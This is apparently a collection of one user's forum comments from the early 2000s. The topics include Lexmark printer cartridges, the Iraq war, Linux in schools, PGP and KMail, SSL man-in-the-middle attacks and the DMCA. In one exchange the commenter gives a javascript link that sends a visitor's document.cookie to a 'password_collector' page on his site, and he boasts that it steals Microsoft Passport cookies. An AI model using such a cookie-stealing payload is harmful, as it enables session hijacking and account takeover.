Indeed, your post makes sense exactly as you pointed out. However, boycotting a manufacturer after you've bought their product is hardly a statement. It's not like petrol[esso.com] or something, where you buy it every week.
Lexmark could care less if you buy a printer from their competitors. They've not lost any of their reputation. The printer market has not shrunk, and the opposition to their court case has been light enough that they've got away with illegally restricting trade in order to prevent their competitors from selling a product.
So no, a boycott is not difficult to understand. What I don't understand is the usefulness of an unorganised one-person silent boycott. Tell the people you know. Share the story at work. Publish it on your website and in your local newspaper. Lexmark aren't going to have their second-thoughts until the kind of people who populate PC-World go in there already knowing "Lexmark==Evil"
"Do you suppose that there will be a big, screaming banner on the box stating that for now and forever you will be raped by overpriced single-source refills?"
Well, it was pretty clear in most of the computer shops I've visited. You can hardly go and buy a printer without walking past the rows of £30 printer cartridges, all in bright colours, and with a different one for every printer ever invented.
Dammit, why can you not buy a black ink cartridge? Can you imagine if every printer took a different type of paper, and you had to replace all your paper when you went from an S300 to an S500? I've not upgraded my printer since I got it 5 years ago, and the way I see manufacturers behaving, I have no plans to.
Try explaining to your grandparents why the printer they just bought came with so little ink that it needs replacing after 30 pages.
"I told them that I was going to dump my Lexmark printer and buy one of their competitors' models."
Please explain how buying another printer hurts the printer industry?
When I heard about this, I told the four or five people I knew who were planning to buy printers. They didn't buy Lexmark, and I'm glad to have informed them.
"We must stand by and permit the torture and murder of unknown tens of thousands of Iraqis by the Hussein regime"
As opposed to what?
As opposed to the murder of unknown tens of thousands of Iraqis by the Bush regime?
"Will the US be targeting ancient batteries with their smart bombs?"
I try to avoid falling off my chair laughing at the thought. U.S. smart bombs. Hitting targets. Please stop!
Do you imagine that those TV pics (from TIALD) of bombs hitting the designated target were typical of all bombs dropped? Why do you think that you only ever saw one such video, from all the tens of thousands of bombs dropped?
Try it out if you want. We have a TIALD simulator in the office.
"Saddam wasn't too concerned about artifacts...when he invaded Kuwait in 1990 and his soldiers ransacked the museums"
So should each country be responsible for the acts committed by its soldiers?
"i wonder did anyone bother submitting this idea to the Mozilla people instead of to slashdot ?"
Where do you think the mozilla hackers live?
"Any easy way to verify this yourself?"
At a guess, a packet sniffer. Try running update once, then installing a piece of non-MS software and running it again to see if anything's changed.
"The support overhead should be non-existent, as the school district IT staff should just set them all up as terminals, or can have images handy for quick ghosting (if needs be)"
What's with dumb terminals in schools? They're going to buy the latest flashiest computers anyway just to show them off at open-days, so why not take that as granted and say "by the way, we can save $800 per computer on licenses" and install KDE?
Linux in school doesn't have to mean command-lines and programming classes. If you're going to expose people to the world's second-best operating system, then why not show them around the rest of the OS too? People's perception of Linux shouldn't be "we telnet to it in programming class", it should be "it does everything Windows does, but better"
"The FCC allows unlicensed low-power FM broadcasts without a license"
Don't try this in the United Kingdom.
"what the hell kind of link is that?"
It's one which, if clicked by anyone using Internet Explorer, will send their Microsoft Passport cookies to a page on my site, which will allow me to log into any passport-protected site as them.
p.s. I just copied the link-format from 2600; I've not investigated it much myself, as a Mozilla user.
"Microsoft is requiring users who want the IRM functionality to be running the super-secure Microsoft Passport"
about://passport.microsoft.com/ javascript:document.location = "mysite.org/password_collector?" + document.cookie;
"When it's called PGP it's good, when they call it Microsoft Something Something it's bad?"
Microsoft product's primary purpose is evil. PGP's primary purpose is good. PGP is used by individuals to protect their privacy. DRM is used by corporations to screw their customers.
"I always write plaintext emails - I guess I'm not enough of a geek to do GPG in my head."
That's probably about right in Windows (cut'n'paste to PGP is an ass, and you can't browse your email folders), but believe me, it becomes a lot easier when you get KMail running.
KMail will just ask you once for the passphrase, and then display encrypted email messages as normal - lovely. The only difficulty is that it can take some time to get GPG itself working, or to import keys. Anyone's welcome to email me to ask for help.
On Windows, the easiest way is to pay $30 for The Bat[ritalabs.com] which includes its own PGP implementation, or Enigmail[projects.mozdev.org] which works with Mozilla mail and GPG. Both of those systems are excellent email clients, with encryption just the icing on the cake.
Don't be tempted to use the PGP plugin with Outlook or Express. It has the potential to crash the program, and leave you unable to even see the encrypted text.
Interestingly, the research notes that the email program tested was set to check all of its accounts every 5 minutes, thus scuppering any security that relies on timestamps. Somewhat offtopic, but certainly an interesting thing to note for people designing systems.
"This looks like a 'man in the middle' attack to me, not so much a failure of ssl."
Okay. I recently suffered a man-in-the-middle attack. I was faced with the choice of using insecure alternatives to communicate, or not being able to read email or update my website.
My family quite often have problems with secure email. It doesn't take a genius to work out that when their secure email fails, they turn it off and write plaintext emails.
MitM attacks are not to be sniffed at. With the clueless [or deadline-pressed] public, you can defeat encryption just by scrambling it.
"However, many websites currently use the "key under the doormat" approach to security"
Perhaps worse is that the public have been led to believe that "HTTPS" and a padlock icon mean that a website is secure.
I've chatted to plenty of ecommerce website operators, and they really are clueless. People who wouldn't know what a hash was if you slapped them with one. They buy a Verisign certificate, and that's the end of that. Post a big notice on the front page saying "your transactions are protected by unbreakable security"
People believe it.
Read 2600's credit-card ordering page for comparison:
We do not save your credit card information after your order is complete. We also do not share ANY of your information with anyone. If you've ordered a subscription, your name and address reside on our subscriber database which is located on a machine that is never connected to the net and which is protected by two levels of encryption that even the NSA would have trouble with. We will also NEVER send you unsolicited mail. In other words, we know a thing or two about privacy and we will do everything possible to protect yours.
If that's what a policy should look like, why do we even let amazon and yahoo get away with their "your credit card is secure with us" lies?
"Want to make ... some of the most toxic substances known?"
Welcome to my fridge.
You have to calculate your own taxes? Wow, that really sucks. So where does all that IRS money go, if they're not even prepared to send you a tax bill?
People here are saying they spend thousands of dollars paying accountants, just to tell them how much tax to pay. And that's as well as the tax itself.
Why is it tolerated at all? If the IRS wants some money, they can damn well tell you what money they want and why.
After all, it's not as if they don't already know every detail of your payroll. Or (in the UK) authorised to read your email and employ private dicks to spy on people.
"Argh, why's there no support for Winamp 3?"
Because WinAmp3 sucks, as you'll discover the next time you have to wait 10 seconds for it to load, or have Windows crash when you try to change themes.
My keyboard has a penguin key between Ctrl and Meta -- it activates the KDE application menu, or the Gnome background menu.
"If they're so worried the voting software is closed source, why not start an open source project?"
Because they don't need to. It already exists -- the need now is for people to make sure that the good systems get used.
There's no point writing the best software if people running the elections go out and buy a piece-of-shit proprietary system just because they know the people selling it, and it has a cool brochure.
"So, is a windows 2000 install disk now illegal under the DMCA as a circumvention device?"
Absolutely. You may laugh, you may moderate it funny, but if you can get this into court and sue microsoft for publishing a circumvention device [which protects copyrighted material on your windows partition], you have a great example with which to shoot down the DMCA.
Which leads to a question I've wondered about for a long time:
Why is the /home/ filesystem not by default encrypted with the users' passwords?
Admittedly this could be rather a processor-strain on servers with thousands of users, but for machines where you don't want people to be able to login to your account with a bootdisk, isn't this rather an oversight?
"It does this with my patented Mind Matrix Technology (TM) that uses a complex mathematical formula to determine what the user wants to see next."
I think this is planned for the Windows Palladium MSN-Internet Explorer TM browser. You'll just open the browser and it'll show you the sites it thinks you should visit.
If you can't wait till then, and want to try the beta test, download RealPlayer, and check the "I want to install the download manager" option.